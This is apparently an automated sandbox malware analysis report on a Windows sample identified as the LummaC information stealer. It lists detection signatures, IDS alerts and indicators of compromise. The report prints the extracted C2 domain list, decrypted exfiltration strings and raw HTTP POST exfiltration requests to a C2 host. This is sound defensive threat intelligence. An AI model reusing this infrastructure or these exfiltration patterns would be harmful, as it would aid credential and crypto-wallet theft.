Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1580145
MD5:	245d1f68f4e8caffb294d206958761e5
SHA1:	d80d3805309b53632aabb56a1a3284c1e8ba6c26
SHA256:	397c3c9ce2aff57799b4620f05103733cc2489f91df6da545b5c1e5ac4350ebb
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Loader.exe (PID: 380 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 245D1F68F4E8CAFFB294D206958761E5)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Loader.exe (PID: 504 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 245D1F68F4E8CAFFB294D206958761E5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "curverpluch.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "volcanohushe.click", "manyrestro.lat"], "Build id": "pqZnKP--Z2xsZXhl"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 504	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Loader.exe PID: 504	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 504	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Loader.exe PID: 504	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:17:04.845791+0100	2028371	3	Unknown Traffic	192.168.2.6	49708	172.67.145.201	443	TCP
2024-12-24T02:17:07.080105+0100	2028371	3	Unknown Traffic	192.168.2.6	49709	172.67.145.201	443	TCP
2024-12-24T02:17:09.470936+0100	2028371	3	Unknown Traffic	192.168.2.6	49710	172.67.145.201	443	TCP
2024-12-24T02:17:12.305800+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	172.67.145.201	443	TCP
2024-12-24T02:17:15.429568+0100	2028371	3	Unknown Traffic	192.168.2.6	49723	172.67.145.201	443	TCP
2024-12-24T02:17:18.748829+0100	2028371	3	Unknown Traffic	192.168.2.6	49730	172.67.145.201	443	TCP
2024-12-24T02:17:21.891648+0100	2028371	3	Unknown Traffic	192.168.2.6	49743	172.67.145.201	443	TCP
2024-12-24T02:17:26.564441+0100	2028371	3	Unknown Traffic	192.168.2.6	49754	172.67.145.201	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:17:05.854185+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49708	172.67.145.201	443	TCP
2024-12-24T02:17:07.871102+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49709	172.67.145.201	443	TCP
2024-12-24T02:17:27.334990+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49754	172.67.145.201	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:17:05.854185+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49708	172.67.145.201	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:17:07.871102+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49709	172.67.145.201	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T02:17:19.521214+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49730	172.67.145.201	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "curverpluch.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "volcanohushe.click", "manyrestro.lat"], "Build id": "pqZnKP--Z2xsZXhl"}

Multi AV Scanner detection for submitted file

Source: Loader.exe	ReversingLabs: Detection: 36%
Source: Loader.exe	Virustotal: Detection: 31%			Perma Link

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: volcanohushe.click
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: pqZnKP--Z2xsZXhl

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00417745 CryptUnprotectData,

3_2_00417745

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49754 version: TLS 1.2

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00ED0CF8 FindFirstFileExW,	0_2_00ED0CF8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00ED0DA9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00ED0CF8 FindFirstFileExW,	3_2_00ED0CF8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00ED0DA9

Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	3_2_0042D0CD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	3_2_0040D11B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, eax	3_2_0040D11B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00409400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-65h]	3_2_0043D4E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000278h]	3_2_00417745
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00440770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4557D5DCh]	3_2_004387D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_00429070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then xor ebx, ebx	3_2_00429070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, eax	3_2_004058D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebp, eax	3_2_004058D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	3_2_004158FC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00416896
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	3_2_0042C89E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042B8BD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042B963
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx+04h]	3_2_0040D907
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h]	3_2_00440180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	3_2_0041598C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	3_2_0041B9A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5C093193h]	3_2_0041B25A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, ebx	3_2_00417A75
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00417207
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042B215
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043F286
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-2DCF3881h]	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00417AB8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], ecx	3_2_0042BB60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], ecx	3_2_0042BB66
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_00402B70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-00000098h]	3_2_00421B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]	3_2_00421B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0043DB10
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0043D325
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4EB33D1Fh]	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+28h]	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then test eax, eax	3_2_004393D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push eax	3_2_004393D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_004073F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_004073F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041A3A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h	3_2_0040B3BB
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-2Ch]	3_2_0043E450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h]	3_2_00440450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00426430
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	3_2_0040E49F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, dword ptr [0044A454h]	3_2_0040C4AE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042856C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [00446180h]	3_2_00415506
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh	3_2_00415506
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00418DC5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	3_2_0041D5B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]	3_2_0041864E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00428630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp cl, 0000002Eh	3_2_00426639
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00426639
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]	3_2_0042963E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+28h]	3_2_00417EEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00417EEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00429E80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-098D4F7Eh]	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	3_2_0043CEA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00409EB9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_00418F52
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00435F00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]	3_2_0042963E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx]	3_2_0040AF23
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx]	3_2_0043F730
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_004167E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	3_2_00424F80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebp-1EB1B624h]	3_2_004257AC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49708 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49708 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49730 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 172.67.145.201:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: volcanohushe.click
Source: Malware configuration extractor	URLs: manyrestro.lat

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49723 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.145.201:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49754 -> 172.67.145.201:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SG98CQFNYPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12814Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=THM6ZXIUPF3JTHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15084Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RFJR6IVX9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19912Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0E53ER9TEJJPPHBTIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EMRBGJPTQMJ4B8SPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 575935Host: volcanohushe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: volcanohushe.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: volcanohushe.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click

Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
